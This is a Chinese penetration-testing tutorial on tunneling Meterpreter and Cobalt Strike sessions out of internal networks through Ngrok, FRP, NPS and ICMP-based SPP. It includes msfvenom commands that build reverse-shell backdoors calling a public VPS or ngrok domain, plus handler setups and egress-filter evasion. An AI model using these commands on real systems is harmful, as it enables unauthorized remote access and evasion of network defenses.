首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【内网安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

【内网安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

作者头像
没事就要多学习
发布2024-07-18 15:25:23
发布2024-07-18 15:25:23
31400
代码可运行
举报
文章被收录于专栏:Cyber SecurityCyber Security
运行总次数:0
代码可运行

内网穿透-Ngrok-入门-上线

需要实名人脸验证 收费 官网注册按照使用手册就可以实现内网穿透,认证需要手续费,提供免费隧道但是速度慢 https://www.ngrok.cc/ 支持的协议:tcp、http、https 支持的类型:正向代理、反向代理

提供Ngrok和Frp两种服务器,两种服务器都支持http、https、tcp转发,Ngrok不支持udp转发,但是Frp支持udp的。两个服务器在使用上没有太多差别。如果是调试支付回调或者微信开发的话,Ngrok会比Frp好更多,因为可以http请求重现

1、服务端配置:

开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道

2、客户端连接服务端:

./sunny clientid 133328291918 //控制端连接Ngrok的服务器

在这里插入图片描述
在这里插入图片描述

3、客户端生成后门配置监听:

代码语言:javascript
代码运行次数:0
运行
复制
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o tcp.exe

注意这里生成木马是使用的是ngrok平台提供的域名,本地kali客户端使用隧道号与平台建立连接,靶机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到本地kali上,实现内网穿透。免费的隧道协议有三种,如果上不了线可以一一尝试。

代码语言:javascript
代码运行次数:0
运行
复制
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run

内网穿透-Frp-简易型-上线

推荐 https://github.com/fatedier/frp frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。 自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件frps.ini:

[common] bind_port = 7000

启动服务端: ./frps -c ./frps.ini

2.控制端-下载-解压-修改-启动

控制端修改配置文件frpc.ini:

[common] server_addr = 47.94.236.117 server_port = 7000 #frpc工作端口,必须和上面frps保持一致 [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 #转发给本机的5555 remote_port = 6000 #服务端用6000端口转发给本机

启动客户端: ./frpc -c ./frpc.ini

代码语言:javascript
代码运行次数:0
运行
复制
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6000 -f exe -o frp.exe
代码语言:javascript
代码运行次数:0
运行
复制
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

3.靶机运行frp.exe即可

注意kali lilnux 监听的LHOST地址为127.0.0.1:5555,靶机为win server 2008 跳板机为vps

frp内网穿透-上线本地kali

内网穿透-Nps-自定义-上线

推荐 相当于自己管理整个平台很方便 https://github.com/ehang-io/nps nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。

-服务端:

1、启动 ./nps install ./nps http://IP:8080/ admin/123 2、创建客户端,生成密匙

在这里插入图片描述
在这里插入图片描述

3、添加协议隧道,绑定指向 远程绑定5566,指向本地88

在这里插入图片描述
在这里插入图片描述

-客户端:

1、连接服务端:

代码语言:javascript
代码运行次数:0
运行
复制
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v  #创建客户端后自动生成密钥

2、生成后门:

代码语言:javascript
代码运行次数:0
运行
复制
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe

3、监听后门:

代码语言:javascript
代码运行次数:0
运行
复制
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 88
run
在这里插入图片描述
在这里插入图片描述

内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp 支持的协议:tcp、udp、udp、icmp、http、kcp、quic 支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理 在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议, 但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。 在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

1、服务端: 监听本地icmp流量

./spp -type server -proto ricmp -listen 0.0.0.0

在这里插入图片描述
在这里插入图片描述

2、客户端: 将本地5555端口流量转发至47.94.236.117 80端口上(TCP封装成ICMP)

spp -name “test” -type proxy_client -server 47.94.236.117 -fromaddr :5555 -toaddr :80 -proxyproto tcp -proto ricmp

在这里插入图片描述
在这里插入图片描述

3、CS 监听器1:http 47.94.236.117 80 监听器2:http 127.0.0.1 5555 生成后门:监听器2

使用隧道后,会话交互会很慢,很容易断开连接

在这里插入图片描述
在这里插入图片描述
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1、服务端配置:
  • 2、客户端连接服务端:
  • 3、客户端生成后门配置监听:
  • 内网穿透-Frp-简易型-上线
    • 1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
    • 2.控制端-下载-解压-修改-启动
    • 3.靶机运行frp.exe即可
  • 内网穿透-Nps-自定义-上线
    • -服务端:
    • -客户端:
  • 内网穿透-Spp-特殊协议-上线
    • 1、服务端: 监听本地icmp流量
    • 2、客户端: 将本地5555端口流量转发至47.94.236.117 80端口上(TCP封装成ICMP)
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档